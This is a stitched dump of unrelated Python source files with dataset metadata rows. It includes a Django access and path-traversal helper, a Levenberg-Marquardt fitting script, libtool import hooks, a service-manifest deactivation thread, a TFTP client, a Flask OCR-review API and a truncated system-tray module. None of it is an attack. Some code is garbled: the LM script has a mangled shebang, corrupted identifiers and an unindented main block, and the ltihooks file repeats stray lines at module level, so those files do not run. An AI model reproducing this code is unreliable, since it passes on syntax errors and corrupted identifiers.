    to which a task belongs to.
    Perhaps this could be added as a django-rest filter?
    Retrieves a project and raises an exception if the current user
    has no access to it.
    """
    try:
        project = models.Project.objects.get(pk=project_pk, deleting=False)
    except ObjectDoesNotExist:
        # Hide the project's existence from unauthorized users.
        raise exceptions.NotFound()
    # Every requested row-level permission must hold for this user.
    if not all(request.user.has_perm(perm, project) for perm in perms):
        raise exceptions.NotFound()
    return project
def path_traversal_check(unsafe_path, known_safe_path):
    """Return the absolute form of ``unsafe_path`` if it lies within
    ``known_safe_path``; raise SuspiciousFileOperation otherwise.

    :param unsafe_path: possibly attacker-controlled path
    :param known_safe_path: directory the path must stay inside
    :raises SuspiciousFileOperation: on a path-traversal attempt
    """
    known_safe_path = os.path.abspath(known_safe_path)
    unsafe_path = os.path.abspath(unsafe_path)
    # BUGFIX: os.path.commonprefix compares character-by-character, so
    # "/safe2/evil" used to pass a check against "/safe". commonpath compares
    # whole path components and closes that traversal bypass.
    if os.path.commonpath([known_safe_path, unsafe_path]) != known_safe_path:
        raise SuspiciousFileOperation("{} is not safe".format(unsafe_path))
    # Passes the check
    return unsafe_path
zlcnup/csmath | hw4_lm/lm.py | 1 | 2784 | # -*- coding: utf-8 -*-
#!/usr/bin/enzl_v python
from pylab import *
from numpy import *
from math import *
def data_generator(N):
    """Generate test data for the LM fit.

    Returns (coff, y, x0): per-sample coefficients (a_i, b_i) drawn from a
    2-D Gaussian, observations y_i = a_i * exp(-b_i * x_i), and a noisy
    initial guess x0 of the sample points x.
    """
    # Coefficient distribution: mean (3.4, 4.5), independent variances 1 and 10.
    mean = [3.4, 4.5]
    cov = [[1, 0], [0, 10]]
    coff = np.random.multivariate_normal(mean, cov, N)
    # Sample points and the corresponding observation vector y.
    x = np.random.uniform(1, N, N)
    y = [coff[i][0] * exp(-coff[i][1] * x[i]) for i in range(N)]
    # Initial guess: the true x perturbed by small Gaussian noise.
    x0 = [xi + np.random.normal(0.0, 0.3) for xi in x]
    return coff, y, x0
def jacobian(zl_coff, x0, N):
    """Build the N x N Jacobian of the residual functions.

    J[i][j] = d f_i / d x_j = -a_i * b_i * exp(-b_i * x_j),
    where (a_i, b_i) = zl_coff[i].
    """
    J = zeros((N, N), float)
    for i in range(N):
        a_i, b_i = zl_coff[i][0], zl_coff[i][1]
        for j in range(N):
            J[i][j] = -a_i * b_i * exp(-b_i * x0[j])
    return J
def normG(g):
    """Return the infinity norm of vector g (its largest absolute component)."""
    magnitudes = abs(g)
    return magnitudes[magnitudes.argmax()]
def zl_LM(zl_coff, y, x0, N, maxIter):
    """Levenberg-Marquardt iteration for x given coefficients and observations y.

    Prints the solution vector and residual sum when converged (change in the
    squared residual below the threshold) or when maxIter is reached.
    """
    zl_numIter = 0
    zl_v = 2
    zl_miu = 0.05 # damping coefficient
    x = x0
    zl_Threshold = 1e-5
    zl_preszl_fx = 100000  # previous squared-residual sum (init: large sentinel)
    while zl_numIter < maxIter:
        zl_numIter += 1
        # compute the Jacobian matrix
        J = jacobian(zl_coff, x, N)
        # compute the Hessian approximation, Ep and g
        A = dot(J.T,J)
        zl_fx = zeros((N,N),float)
        zl_fx = [zl_coff[i][0]*exp(-zl_coff[i][1]*x[i]) for i in range(N)]
        szl_fx = sum(array(zl_fx)*array(zl_fx))
        Ep = array(y) - array(zl_fx)
        g = array(dot(J.T,Ep))
        # Damped normal equations: (J^T J + miu*I) * step = g
        H = A + zl_miu*np.eye(N)
        DTp = solve(H, g)
        x = x + DTp
        zl_fx2 = zeros(N,float)
        for j in range(N):
            zl_fx2[j] = zl_coff[j][0]*exp(-zl_coff[j][1])
        szl_fx2 = sum(array(zl_fx2)*array(zl_fx2))
        if abs(szl_fx - zl_preszl_fx) < zl_Threshold:
            print("The zl_vector x is: ")
            print(x)
            print("The sum is: ")
            print(szl_fx2)
            break
        # Adjust damping: decrease on sufficient gain, otherwise increase.
        if szl_fx2 < (szl_fx+0.5*sum(array(g)*array(Ep))):
            zl_miu /= zl_v
        else :
            zl_miu *= 2
    if zl_numIter == maxIter:
        print("The zl_vector x0 is: ")
        print(x0)
        print("The zl_vector x is: ")
        print(x)
        print("The sum is: ")
        print(szl_fx2)
if __name__ == "__main__":
#输入向量空间的长度N(在这里假设m=n)
print("Please Input the dimension N of zl_vector space and the maxIter (the product of N and maxIter not be too large)")
N = input("Input N (not be too large): ")
N = int(N)
maxIter = input("Input the max number of interation (larger than half of the N): ")
maxIter = int(maxIter)
zl_coff, y, x0 = data_generator(N)
#zl_LM算法
zl_LM(zl_coff, y, x0, N, maxIter)
| mit | -685,786,909,710,917,200 | 28.573034 | 124 | 0.518237 | false | 2.270923 | false | false | false |
atizo/pygobject | ltihooks.py | 1 | 2327 | # -*- Mode: Python; py-indent-offset: 4 -*-
# ltihooks.py: python import hooks that understand libtool libraries.
# Copyright (C) 2000 James Henstridge.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os, ihooks
class LibtoolHooks(ihooks.Hooks):
    """Import hooks that resolve libtool ``.la`` archives to the real shared
    object they describe before loading them as dynamic modules."""
    def get_suffixes(self):
        """Like normal get_suffixes, but adds .la suffixes to list"""
        ret = ihooks.Hooks.get_suffixes(self)
        # Prepend so .la files are preferred over the standard suffixes.
        ret.insert(0, ('module.la', 'rb', 3))
        ret.insert(0, ('.la', 'rb', 3))
        return ret
    def load_dynamic(self, name, filename, file=None):
        """Like normal load_dynamic, but treat .la files specially"""
        if len(filename) > 3 and filename[-3:] == '.la':
            # Parse the .la metadata file for the shared-object name (dlname)
            # and whether the library has been installed.
            fp = open(filename, 'r')
            dlname = ''
            installed = 1
            line = fp.readline()
            while line:
                if len(line) > 7 and line[:7] == 'dlname=':
                    # Value is quoted: strip the quotes and trailing newline.
                    dlname = line[8:-2]
                elif len(line) > 10 and line[:10] == 'installed=':
                    installed = line[10:-1] == 'yes'
                line = fp.readline()
            fp.close()
            if dlname:
                if installed:
                    filename = os.path.join(os.path.dirname(filename),
                                            dlname)
                else:
                    # Uninstalled libtool builds keep the real library in .libs/.
                    filename = os.path.join(os.path.dirname(filename),
                                            '.libs', dlname)
        return ihooks.Hooks.load_dynamic(self, name, filename, file)
'.libs', dlname)
return ihooks.Hooks.load_dynamic(self, name, filename, file)
# Module-level importer wired up with the libtool-aware hooks.
importer = ihooks.ModuleImporter()
importer.set_hooks(LibtoolHooks())
def install():
    """Activate the libtool import hooks globally."""
    importer.install()
def uninstall():
    """Restore the default import machinery."""
    importer.uninstall()
# Install the hooks as a side effect of importing this module.
install()
| lgpl-2.1 | -552,883,266,822,510,400 | 37.783333 | 75 | 0.593468 | false | 4.032929 | false | false | false |
eBay/cronus-agent | agent/agent/lib/agent_thread/deactivate_manifest.py | 1 | 5040 | #pylint: disable=W0703,R0912,R0915,R0904,W0105
'''
Copyright 2014 eBay Software Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
""" Thread to perform creation of a service """
import os
import shutil
import traceback
from agent.lib.utils import islink
from agent.lib.utils import readlink
from agent.lib.errors import Errors
from agent.lib.errors import AgentException
from agent.controllers.service import ServiceController
import logging
from agent.lib.agent_thread.manifest_control import ManifestControl
from agent.lib import manifestutil
class DeactivateManifest(ManifestControl):
""" This thread will attempt to activate a manifest
This means going throuh each package
call the stop
call the deactivate
delete the active link
call the activate
create the active link
call start
"""
THREAD_NAME = 'deactivate_manifest'
def __init__(self, threadMgr, service):
""" Constructor """
ManifestControl.__init__(self, threadMgr, service, manifest = None, name = 'deactivate_manifest')
self.setName(DeactivateManifest.THREAD_NAME)
self.__LOG = manifestutil.getServiceLogger(self, logging.getLogger(__name__))
def doRun(self):
""" Main body of the thread """
errorMsg = ""
errorCode = None
failed = False
try:
activePath = os.path.join(ServiceController.manifestPath(self._service), 'active')
oldManifest = None
# make sure that if the active path exists, it's a link
# if not log that and delete the link
if (os.path.exists(activePath) and not os.name == 'nt' and not islink(activePath)):
self.__LOG.error('%s is not a link. Attempted to delete' % activePath)
shutil.rmtree(activePath)
if (os.path.exists(activePath)):
oldManifest = os.path.basename(readlink(activePath))
else:
raise AgentException(error = Errors.ACTIVEMANIFEST_MANIFEST_MISSING, errorMsg = 'No active manifest - cannot deactivate service')
self.__deactivateManifest(self._service, oldManifest)
self.__removeSymlink(self._service)
except SystemExit as exc:
failed = True
if (len(exc.args) == 2):
# ok we got {err code, err msg}
errorCode = exc.args[0]
errorMsg = exc.args[1]
raise exc
except AgentException as exc:
failed = True
errorMsg = 'Deactivate Manifest - Agent Exception - %s' % exc.getMsg()
errorCode = exc.getCode()
except Exception as exc:
failed = True
errorMsg = 'Deactivate Manifest - Unknown error - (%s) - %s - %s' \
% (self._service, str(exc), traceback.format_exc(5))
errorCode = Errors.UNKNOWN_ERROR
finally:
if failed:
self.__LOG.warning(errorMsg)
self._updateStatus(httpStatus = 500, error = errorCode,
errorMsg = errorMsg)
self.__LOG.debug('Done: activate manifest for (%s)' % (self._service))
self._updateProgress(100)
def __deactivateManifest(self, service, manifest):
""" deactive a manifest. This means calling stop then deactive on the manifest
@param service - service of manifest to deactivate
@param manifest - manifest to deactivate
@param stack - stack for recovery
"""
self.__LOG.debug("Deactivate Manifest %s-%s" % (service, manifest))
if (manifest == None):
return
self._execPackages('shutdown', service, manifest, 11, 25, activateFlow = False)
self._execPackages('deactivate', service, manifest, 26, 50, activateFlow = False)
manifestutil.processControllerInPackage(service, manifest, activateFlow = False)
def __removeSymlink(self, service):
""" remove symlink """
#remove symlink
activePath = self.__getSymlinkPath(service)
if os.path.exists(activePath):
if (os.path.islink(activePath)): # *nix
os.remove(activePath)
else:
raise AgentException('Running platform seems to be neither win32 nor *nix with any (sym)link support. Can\'t proceed with link deletion')
def __getSymlinkPath(self, service):
""" return symlink path for a service """
return os.path.join(ServiceController.manifestPath(service), 'active')
| apache-2.0 | 1,921,334,820,953,624,800 | 38.069767 | 153 | 0.639286 | false | 4.405594 | false | false | false |
cizixs/tftp | tftp/tftp_client.py | 1 | 7600 | import sys
import struct
import binascii
import argparse
import tftp
from tftp import SocketBase
from tftp import get_opcode
from tftp import default_port
from tftp import make_data_packet
from tftp import make_ack_packet
class State(object):
    """Client protocol phases: START (no request sent yet), DATA (transferring)."""
    START = 0
    DATA = 1
# Make packet functions.
def make_request_packet(opcode, filename, mode='octet'):
    """Build a TFTP request packet: opcode, filename, NUL, mode, NUL (RFC 1350)."""
    layout = '! H %ds B %ds B' % (len(filename), len(mode))
    return struct.pack(layout, opcode, filename, 0, mode, 0)
def make_rrq_packet(filename):
    """Build a read-request (RRQ) packet for *filename*."""
    return make_request_packet(tftp.RRQ, filename)
def make_wrq_packet(filename):
    """Build a write-request (WRQ) packet for *filename*."""
    return make_request_packet(tftp.WRQ, filename)
class TftpClient(SocketBase):
    """A simple TFTP client implementing RFC 1350 get/put over UDP."""
    def __init__(self, host='127.0.0.1', port='', filename=None, **argv):
        """Set up connection state and open the local file for the transfer.

        Keyword options: action ('get'/'put'), debug (bool), block_size (int).
        """
        self.host = host
        # Remember the original port: after the first reply the server switches
        # to an ephemeral port, and reset() must start over from the original.
        self.orig_port = self.port = port or default_port()
        self.block_num = 1
        self.is_done = False
        self.status = State.START
        self.action = argv.get('action', 'get')
        self.debug = argv.get('debug', False)
        self.block_size = argv.get('block_size', tftp.DEFAULT_BLOCK_SIZE)
        self.filename = filename
        self.setup_file()
        self.setup_connect()
    def reset(self):
        """Restart transfer state so a new get/put can begin."""
        self.block_num = 1
        self.is_done = False
        self.status = State.START
        self.port = self.orig_port or 69
        self.setup_file()
        self.setup_connect()
    @property
    def server_addr(self):
        # Current (host, port) pair for the server side of the transfer.
        return (self.host, self.port)
    def setup_file(self):
        """Open the local file: write mode for 'get', read mode for 'put'."""
        if self.filename:
            if self.action == 'get':
                self.fd = open(self.filename, 'wb')
            elif self.action == 'put':
                self.fd = open(self.filename, 'rb')
            else:
                raise Exception('unsupport action %s' % self.action)
    def handle_packet(self, packet, addr):
        """Handle packet from remote.
        If it's a wrong packet, not from expected host/port, discard it;
        If it's a data packet, send ACK packet back;
        If it's a error packet, print error and exit;
        If it's a ack packet, send Data packet back.
        """
        host, port = addr
        if host != self.host:
            # ignore packet from wrong address.
            return
        packet_len = len(packet)
        opcode = get_opcode(packet)
        if opcode == tftp.ERROR:
            err_code = struct.unpack('!H', packet[2:4])[0]
            err_msg = packet[4:packet_len-1]
            print "Error %s: %s" % (err_code, err_msg)
            sys.exit(err_code)
        elif opcode == tftp.DATA:
            # This is a data packet received from server, save data to file.
            # update port
            if self.port != port:
                self.port = port
            block_num = struct.unpack('!H', packet[2:4])[0]
            if block_num != self.block_num:
                # skip unexpected #block data packet
                print 'unexpected block num %d' % block_num
                return
            data = packet[4:]
            self.fd.write(data)
            # A data block shorter than block_size signals end of transfer.
            if len(packet) < self.block_size + 2:
                self.is_done = True
                self.fd.close()
                file_len = self.block_size * (self.block_num -1) + len(data)
                print '%d bytes received.' % file_len
            self.block_num += 1
        elif opcode == tftp.ACK:
            # This is a write request ACK
            # Send next block_size data to server
            if self.port != port:
                self.port = port
            block_num = struct.unpack('!H', packet[2:4])[0]
            self.verbose('received ack for %d' % block_num)
            self.block_num += 1
        else:
            raise Exception('unrecognized packet: %s', str(opcode))
    def get_next_packet(self):
        """Return the next packet to transmit based on the current state."""
        if self.status == State.START:
            # First packet of the session: RRQ for get, WRQ for put.
            opcode = tftp.RRQ if self.action == 'get' else tftp.WRQ
            self.verbose('about to send packet %d' % opcode)
            packet = make_request_packet(opcode, self.filename)
            self.status = State.DATA
        elif self.status == State.DATA:
            if self.action == 'get':
                self.verbose('about to send ack for %d' % (self.block_num - 1))
                packet = make_ack_packet(self.block_num-1)
            elif self.action == 'put':
                self.verbose('about to send data for %d' % (self.block_num - 1))
                data = self.fd.read(self.block_size)
                # A short final read marks the end of the upload.
                if len(data) < self.block_size:
                    self.is_done = True
                packet = make_data_packet(self.block_num-1, data)
        return packet
    def handle(self):
        """Main loop function for tftp.
        The main loop works like the following:
        1. get next-to-send packet
        2. send the packet to server
        3. receive packet from server
        4. handle packet received, back to step 1.
        """
        while not self.is_done:
            packet = self.get_next_packet()
            if packet:
                self.send_packet(packet)
            (packet, addr) = self.recv_packet()
            self.handle_packet(packet, addr)
def main():
    """Interactive REPL for the TFTP client (connect/get/put/quit)."""
    menu = """Tftp client help menu:
    Supported commands:
    connect     connect to a server
    get         get file
    put         put file
    quit        exit
    ?           print this menu
    """
    # Split a command line into (command, [options]); (None, None) when empty.
    def command_parse(line):
        if not line:
            return (None, None)
        line = line.split()
        command = line[0]
        options = line[1:]
        return command, options
    tftp_client = TftpClient()
    def connect(*args):
        # args: host [port]
        tftp_client.host = args[0]
        if len(args) > 1:
            tftp_client.port = int(args[1])
    def get(*args):
        # args: filename — download from the connected server.
        print args[0]
        tftp_client.action = 'get'
        tftp_client.filename = args[0]
        tftp_client.reset()
        tftp_client.handle()
    def put(*args):
        # args: filename — upload to the connected server.
        tftp_client.filename = args[0]
        tftp_client.action = 'put'
        tftp_client.reset()
        tftp_client.handle()
    def quit(*args):
        print 'Bye!'
    def print_help(*args):
        print menu
    # Dispatch table: unknown commands fall back to print_help.
    command_map = {
        'connect': connect,
        'get': get,
        'put': put,
        'quit': quit,
    }
    print 'Welcome to python tftpclient.'
    while True:
        line = raw_input('tftp> ').strip().lower()
        command, options = command_parse(line)
        command_map.get(command, print_help)(*options)
        if command == 'quit':
            break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Tftp client in pure python.')
parser.add_argument('--host', '-s', action='store', dest='host',
default='127.0.0.1', help='Server hostname')
parser.add_argument('--port', '-p', action='store', dest='port', type=int,
default=69, help='Server port')
parser.add_argument('--file', '-f', action='store', dest='filename',
help='File to get from server')
parser.add_argument('--debug', '-d', action='store_true',
default=False, help='Debug mode: print more information(debug: False)')
parser.add_argument('action', metavar='action', nargs='*',
help='Action to conduct: put or get(default: get)')
args = parser.parse_args()
print args
if not args.filename or not args.action:
main()
else:
tftp_client = TftpClient(args.host, args.port, args.filename,
action=args.action[0], debug=args.debug)
tftp_client.handle()
| mit | -6,937,391,200,844,491,000 | 31.340426 | 83 | 0.550526 | false | 3.830645 | false | false | false |
mduggan/toumeika | shikin/review.py | 1 | 4611 | # -*- coding: utf-8 -*-
"""
Shikin review page and associated API
"""
from sqlalchemy import func
import datetime
import random
from flask import render_template, abort, request, jsonify, session
from . import app, ocrfix
from .model import DocSegment, DocSegmentReview, User
from .util import dologin
def get_user_or_abort():
    """Return the User record for the current session, aborting with 403
    when no user is logged in or the user is unknown."""
    username = session.get('username')
    if not username:
        abort(403)
    record = User.query.filter(User.name == username).first()
    if not record:
        abort(403)
    return record
@app.route('/api/reviewcount/<user>')
def review_count(user):
    """Return the number of reviews submitted by *user* as JSON (404 if unknown)."""
    u = User.query.filter(User.name == user).first()
    if not u:
        return abort(404)
    return jsonify({'user': user, 'count': len(u.reviews)})
@app.route('/api/unreview/<int:segmentid>')
def unreview(segmentid):
    """Decrement a segment's view count and, when a valid ``revid`` query
    parameter is given, delete that review if it belongs to the current user.

    Returns a JSON status object; 404 when the segment or review is unknown,
    403 when not logged in.
    """
    user = get_user_or_abort()
    revid = request.args.get('revid')
    ds = DocSegment.query.filter(DocSegment.id == segmentid).first()
    if not ds:
        abort(404)
    ds.viewcount = max(0, ds.viewcount-1)
    app.dbobj.session.add(ds)
    if not revid or not revid.isdigit():
        # No (valid) review id: just persist the view-count change.
        # BUGFIX: this branch used to return None, which is an error for a
        # Flask view function — return a JSON response instead.
        app.dbobj.session.commit()
        return jsonify({'status': 'ok'})
    revid = int(revid)
    old = DocSegmentReview.query.filter(DocSegmentReview.id == revid, DocSegmentReview.user_id == user.id).first()
    if not old:
        abort(404)
    app.dbobj.session.delete(old)
    app.dbobj.session.commit()
    return jsonify({'status': 'ok', 'id': revid})
@app.route('/api/review/<int:segmentid>')
def review_submit(segmentid):
    """Record a review for a segment: either new text (``text`` parameter) or
    a skip (``skip`` parameter). Returns a JSON status object."""
    user = get_user_or_abort()
    ds = DocSegment.query.filter(DocSegment.id == segmentid).first()
    if not ds:
        abort(404)
    text = request.args.get('text')
    skip = request.args.get('skip')
    if text is None and not skip:
        abort(404)
    timestamp = datetime.datetime.now()
    ds.viewcount += 1
    app.dbobj.session.add(ds)
    if skip:
        # Skipped segments only bump the view count; no review row is created.
        app.dbobj.session.commit()
        return jsonify({'status': 'ok'})
    # Find the latest existing revision for this segment, if any.
    old = DocSegmentReview.query\
        .filter(DocSegmentReview.segment_id == ds.id)\
        .order_by(DocSegmentReview.rev.desc())\
        .first()
    if old is not None:
        rev = old.rev + 1
    else:
        rev = 1
    newrev = DocSegmentReview(segment=ds, rev=rev, timestamp=timestamp, user=user, text=text)
    app.dbobj.session.add(newrev)
    app.dbobj.session.commit()
    return jsonify({'status': 'ok', 'id': newrev.id})
@app.route('/api/reviewdata', methods=['GET'])
def reviewdata():
    """Return the least-reviewed segments of one randomly chosen page as JSON."""
    # Find a random early page with lots of unreviewed items. This way even
    # with multiple simultaneous users they should get different pages.
    minviewcount = app.dbobj.session.query(func.min(DocSegment.viewcount)).one()[0]
    # "!= None" is the SQLAlchemy idiom for SQL "IS NOT NULL" — do not
    # replace it with "is not None".
    q = app.dbobj.session.query(DocSegment.doc_id, DocSegment.page)\
        .filter(DocSegment.ocrtext != None)\
        .filter(DocSegment.viewcount <= minviewcount)\
        .distinct()
    pages = list(q.all())
    app.logger.debug("%d pages with segments of only %d views" % (len(pages), minviewcount))
    # FIXME: this kinda works, but as all the pages get reviewed it will tend
    # toward giving all users the same page. not really a problem until I have
    # more than 1 user.
    docid, page = random.choice(pages)
    q = DocSegment.query.filter(DocSegment.doc_id == docid)\
        .filter(DocSegment.page == page)\
        .filter(DocSegment.viewcount <= minviewcount)
    segments = q.all()
    if not segments:
        abort(404)
    segdata = []
    for d in segments:
        if d.usertext is None:
            # No user correction yet: offer an auto-corrected OCR guess.
            txt = ocrfix.guess_fix(d.ocrtext)
            suggests = ocrfix.suggestions(d)
        else:
            txt = d.usertext.text
            suggests = []
        lines = max(len(d.ocrtext.splitlines()), len(txt.splitlines()))
        # page is 0-based in the database but 1-based in the API.
        segdata.append(dict(ocrtext=d.ocrtext, text=txt, segment_id=d.id,
                            x1=d.x1, x2=d.x2, y1=d.y1, y2=d.y2,
                            textlines=lines, docid=docid, page=page+1, suggests=suggests))
    return jsonify(dict(segments=segdata, docid=docid, page=page+1))
@app.route('/review', methods=['GET', 'POST'])
def review():
""" Review page """
error = None
user = None
if request.method == 'POST':
user, error = dologin()
if 'username' in session:
u = get_user_or_abort()
uname = u.name
else:
uname = None
return render_template('review.html', user=uname, error=error)
| bsd-2-clause | 2,451,348,942,650,668,500 | 27.81875 | 114 | 0.605942 | false | 3.402952 | false | false | false |
falkTX/Cadence | src/systray.py | 1 | 23718 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# KDE, App-Indicator or Qt Systray
# Copyright (C) 2011-2018 Filipe Coelho <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the COPYING file
# Imports (Global)
import os, sys
if True:
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QAction, QMainWindow, QMenu, QSystemTrayIcon
else:
from PyQt4.QtCore import QTimer
from PyQt4.QtGui import QIcon
from PyQt4.QtGui import QAction, QMainWindow, QMenu, QSystemTrayIcon
try:
if False and os.getenv("DESKTOP_SESSION") in ("ubuntu", "ubuntu-2d") and not os.path.exists("/var/cadence/no_app_indicators"):
from gi import require_version
require_version('Gtk', '3.0')
from gi.repository import Gtk
require_version('AppIndicator3', '0.1')
from gi.repository import AppIndicator3 as AppIndicator
TrayEngine = "AppIndicator"
#elif os.getenv("KDE_SESSION_VERSION") >= 5:
#TrayEngine = "Qt"
#elif os.getenv("KDE_FULL_SESSION") or os.getenv("DESKTOP_SESSION") == "kde-plasma":
#from PyKDE5.kdeui import KAction, KIcon, KMenu, KStatusNotifierItem
#TrayEngine = "KDE"
else:
TrayEngine = "Qt"
except:
TrayEngine = "Qt"
print("Using Tray Engine '%s'" % TrayEngine)
iActNameId = 0
iActWidget = 1
iActParentMenuId = 2
iActFunc = 3
iSepNameId = 0
iSepWidget = 1
iSepParentMenuId = 2
iMenuNameId = 0
iMenuWidget = 1
iMenuParentMenuId = 2
# Get Icon from user theme, using our own as backup (Oxygen)
def getIcon(icon, size=16):
return QIcon.fromTheme(icon, QIcon(":/%ix%i/%s.png" % (size, size, icon)))
# Global Systray class
class GlobalSysTray(object):
def __init__(self, parent, name, icon):
object.__init__(self)
self._app = None
self._parent = parent
self._gtk_running = False
self._quit_added = False
self.act_indexes = []
self.sep_indexes = []
self.menu_indexes = []
if TrayEngine == "KDE":
self.menu = KMenu(parent)
self.menu.setTitle(name)
self.tray = KStatusNotifierItem()
self.tray.setAssociatedWidget(parent)
self.tray.setCategory(KStatusNotifierItem.ApplicationStatus)
self.tray.setContextMenu(self.menu)
self.tray.setIconByPixmap(getIcon(icon))
self.tray.setTitle(name)
self.tray.setToolTipTitle(" ")
self.tray.setToolTipIconByPixmap(getIcon(icon))
# Double-click is managed by KDE
elif TrayEngine == "AppIndicator":
self.menu = Gtk.Menu()
self.tray = AppIndicator.Indicator.new(name, icon, AppIndicator.IndicatorCategory.APPLICATION_STATUS)
self.tray.set_menu(self.menu)
# Double-click is not possible with App-Indicators
elif TrayEngine == "Qt":
self.menu = QMenu(parent)
self.tray = QSystemTrayIcon(getIcon(icon))
self.tray.setContextMenu(self.menu)
self.tray.setParent(parent)
self.tray.activated.connect(self.qt_systray_clicked)
# -------------------------------------------------------------------------------------------
def addAction(self, act_name_id, act_name_string, is_check=False):
if TrayEngine == "KDE":
act_widget = KAction(act_name_string, self.menu)
act_widget.setCheckable(is_check)
self.menu.addAction(act_widget)
elif TrayEngine == "AppIndicator":
if is_check:
act_widget = Gtk.CheckMenuItem(act_name_string)
else:
act_widget = Gtk.ImageMenuItem(act_name_string)
act_widget.set_image(None)
act_widget.show()
self.menu.append(act_widget)
elif TrayEngine == "Qt":
act_widget = QAction(act_name_string, self.menu)
act_widget.setCheckable(is_check)
self.menu.addAction(act_widget)
else:
act_widget = None
act_obj = [None, None, None, None]
act_obj[iActNameId] = act_name_id
act_obj[iActWidget] = act_widget
self.act_indexes.append(act_obj)
def addSeparator(self, sep_name_id):
if TrayEngine == "KDE":
sep_widget = self.menu.addSeparator()
elif TrayEngine == "AppIndicator":
sep_widget = Gtk.SeparatorMenuItem()
sep_widget.show()
self.menu.append(sep_widget)
elif TrayEngine == "Qt":
sep_widget = self.menu.addSeparator()
else:
sep_widget = None
sep_obj = [None, None, None]
sep_obj[iSepNameId] = sep_name_id
sep_obj[iSepWidget] = sep_widget
self.sep_indexes.append(sep_obj)
def addMenu(self, menu_name_id, menu_name_string):
if TrayEngine == "KDE":
menu_widget = KMenu(menu_name_string, self.menu)
self.menu.addMenu(menu_widget)
elif TrayEngine == "AppIndicator":
menu_widget = Gtk.MenuItem(menu_name_string)
menu_parent = Gtk.Menu()
menu_widget.set_submenu(menu_parent)
menu_widget.show()
self.menu.append(menu_widget)
elif TrayEngine == "Qt":
menu_widget = QMenu(menu_name_string, self.menu)
self.menu.addMenu(menu_widget)
else:
menu_widget = None
menu_obj = [None, None, None]
menu_obj[iMenuNameId] = menu_name_id
menu_obj[iMenuWidget] = menu_widget
self.menu_indexes.append(menu_obj)
# -------------------------------------------------------------------------------------------
def addMenuAction(self, menu_name_id, act_name_id, act_name_string, is_check=False):
i = self.get_menu_index(menu_name_id)
if i < 0: return
menu_widget = self.menu_indexes[i][iMenuWidget]
if TrayEngine == "KDE":
act_widget = KAction(act_name_string, menu_widget)
act_widget.setCheckable(is_check)
menu_widget.addAction(act_widget)
elif TrayEngine == "AppIndicator":
menu_widget = menu_widget.get_submenu()
if is_check:
act_widget = Gtk.CheckMenuItem(act_name_string)
else:
act_widget = Gtk.ImageMenuItem(act_name_string)
act_widget.set_image(None)
act_widget.show()
menu_widget.append(act_widget)
elif TrayEngine == "Qt":
act_widget = QAction(act_name_string, menu_widget)
act_widget.setCheckable(is_check)
menu_widget.addAction(act_widget)
else:
act_widget = None
act_obj = [None, None, None, None]
act_obj[iActNameId] = act_name_id
act_obj[iActWidget] = act_widget
act_obj[iActParentMenuId] = menu_name_id
self.act_indexes.append(act_obj)
def addMenuSeparator(self, menu_name_id, sep_name_id):
i = self.get_menu_index(menu_name_id)
if i < 0: return
menu_widget = self.menu_indexes[i][iMenuWidget]
if TrayEngine == "KDE":
sep_widget = menu_widget.addSeparator()
elif TrayEngine == "AppIndicator":
menu_widget = menu_widget.get_submenu()
sep_widget = Gtk.SeparatorMenuItem()
sep_widget.show()
menu_widget.append(sep_widget)
elif TrayEngine == "Qt":
sep_widget = menu_widget.addSeparator()
else:
sep_widget = None
sep_obj = [None, None, None]
sep_obj[iSepNameId] = sep_name_id
sep_obj[iSepWidget] = sep_widget
sep_obj[iSepParentMenuId] = menu_name_id
self.sep_indexes.append(sep_obj)
#def addSubMenu(self, menu_name_id, new_menu_name_id, new_menu_name_string):
#menu_index = self.get_menu_index(menu_name_id)
#if menu_index < 0: return
#menu_widget = self.menu_indexes[menu_index][1]
##if TrayEngine == "KDE":
##new_menu_widget = KMenu(new_menu_name_string, self.menu)
##menu_widget.addMenu(new_menu_widget)
##elif TrayEngine == "AppIndicator":
##new_menu_widget = Gtk.MenuItem(new_menu_name_string)
##new_menu_widget.show()
##menu_widget.get_submenu().append(new_menu_widget)
##parent_menu_widget = Gtk.Menu()
##new_menu_widget.set_submenu(parent_menu_widget)
##else:
#if (1):
#new_menu_widget = QMenu(new_menu_name_string, self.menu)
#menu_widget.addMenu(new_menu_widget)
#self.menu_indexes.append([new_menu_name_id, new_menu_widget, menu_name_id])
# -------------------------------------------------------------------------------------------
def connect(self, act_name_id, act_func):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "AppIndicator":
act_widget.connect("activate", self.gtk_call_func, act_name_id)
elif TrayEngine in ("KDE", "Qt"):
act_widget.triggered.connect(act_func)
self.act_indexes[i][iActFunc] = act_func
# -------------------------------------------------------------------------------------------
#def setActionChecked(self, act_name_id, yesno):
#index = self.get_act_index(act_name_id)
#if index < 0: return
#act_widget = self.act_indexes[index][1]
##if TrayEngine == "KDE":
##act_widget.setChecked(yesno)
##elif TrayEngine == "AppIndicator":
##if type(act_widget) != Gtk.CheckMenuItem:
##return # Cannot continue
##act_widget.set_active(yesno)
##else:
#if (1):
#act_widget.setChecked(yesno)
def setActionEnabled(self, act_name_id, yesno):
i = self.get_act_index(act_name_id)
if i < 0: return
